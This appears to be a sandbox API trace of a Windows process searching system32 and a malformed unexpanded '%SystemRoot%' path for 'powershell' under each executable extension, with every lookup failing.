	[0598.798] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0598.799] SetErrorMode (uMode=0x1) returned 0x1
	[0598.802] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0598.816] SetErrorMode (uMode=0x1) returned 0x1
	[0598.820] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0598.820] SetErrorMode (uMode=0x1) returned 0x1
	[0598.820] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0598.828] SetErrorMode (uMode=0x1) returned 0x1
	[0598.830] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0598.830] SetErrorMode (uMode=0x1) returned 0x1
	[0598.830] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0598.838] SetErrorMode (uMode=0x1) returned 0x1
	[0598.839] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0598.839] SetErrorMode (uMode=0x1) returned 0x1
	[0598.839] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0600.111] SetErrorMode (uMode=0x1) returned 0x1
	[0600.112] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0600.113] SetErrorMode (uMode=0x1) returned 0x1
	[0600.113] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0600.121] SetErrorMode (uMode=0x1) returned 0x1
	[0600.122] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0600.122] SetErrorMode (uMode=0x1) returned 0x1
	[0600.123] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0600.131] SetErrorMode (uMode=0x1) returned 0x1
	[0600.132] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0600.132] SetErrorMode (uMode=0x1) returned 0x1
	[0600.132] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0600.142] SetErrorMode (uMode=0x1) returned 0x1
	[0600.143] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0600.143] SetErrorMode (uMode=0x1) returned 0x1
	[0600.144] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0601.790] SetErrorMode (uMode=0x1) returned 0x1
	[0601.791] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0601.791] SetErrorMode (uMode=0x1) returned 0x1
	[0601.791] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0601.799] SetErrorMode (uMode=0x1) returned 0x1
	[0601.800] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0601.800] SetErrorMode (uMode=0x1) returned 0x1
	[0601.800] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0601.808] SetErrorMode (uMode=0x1) returned 0x1
	[0601.810] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0601.810] SetErrorMode (uMode=0x1) returned 0x1
	[0601.810] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0601.818] SetErrorMode (uMode=0x1) returned 0x1
	[0601.819] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0601.820] SetErrorMode (uMode=0x1) returned 0x1
	[0601.820] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.181] SetErrorMode (uMode=0x1) returned 0x1
	[0603.182] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0603.182] SetErrorMode (uMode=0x1) returned 0x1
	[0603.182] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.193] SetErrorMode (uMode=0x1) returned 0x1
	[0603.195] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0603.195] SetErrorMode (uMode=0x1) returned 0x1
	[0603.195] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.203] SetErrorMode (uMode=0x1) returned 0x1
	[0603.204] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0603.204] SetErrorMode (uMode=0x1) returned 0x1
	[0603.204] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.430] SetErrorMode (uMode=0x1) returned 0x1
	[0604.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0604.431] SetErrorMode (uMode=0x1) returned 0x1
	[0604.431] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.432] SetErrorMode (uMode=0x1) returned 0x1
	[0604.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0604.432] SetErrorMode (uMode=0x1) returned 0x1
	[0604.432] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.433] SetErrorMode (uMode=0x1) returned 0x1
	[0604.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0604.433] SetErrorMode (uMode=0x1) returned 0x1
	[0604.433] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.433] SetErrorMode (uMode=0x1) returned 0x1
	[0604.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0604.434] SetErrorMode (uMode=0x1) returned 0x1
	[0604.434] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.434] SetErrorMode (uMode=0x1) returned 0x1
	[0604.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0604.434] SetErrorMode (uMode=0x1) returned 0x1
	[0604.434] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.435] SetErrorMode (uMode=0x1) returned 0x1
	[0604.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0604.435] SetErrorMode (uMode=0x1) returned 0x1
	[0604.435] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.435] SetErrorMode (uMode=0x1) returned 0x1
	[0604.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0604.436] SetErrorMode (uMode=0x1) returned 0x1
	[0604.436] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.436] SetErrorMode (uMode=0x1) returned 0x1
	[0604.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0604.436] SetErrorMode (uMode=0x1) returned 0x1
	[0604.436] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.437] SetErrorMode (uMode=0x1) returned 0x1
	[0604.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0604.437] SetErrorMode (uMode=0x1) returned 0x1
	[0604.437] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.437] SetErrorMode (uMode=0x1) returned 0x1
	[0604.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0604.438] SetErrorMode (uMode=0x1) returned 0x1
	[0604.438] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.438] SetErrorMode (uMode=0x1) returned 0x1
	[0604.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0604.439] SetErrorMode (uMode=0x1) returned 0x1
	[0604.439] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.439] SetErrorMode (uMode=0x1) returned 0x1
	[0604.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0604.439] SetErrorMode (uMode=0x1) returned 0x1
	[0604.439] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.440] SetErrorMode (uMode=0x1) returned 0x1
	[0604.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0604.440] SetErrorMode (uMode=0x1) returned 0x1
	[0604.440] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.440] SetErrorMode (uMode=0x1) returned 0x1
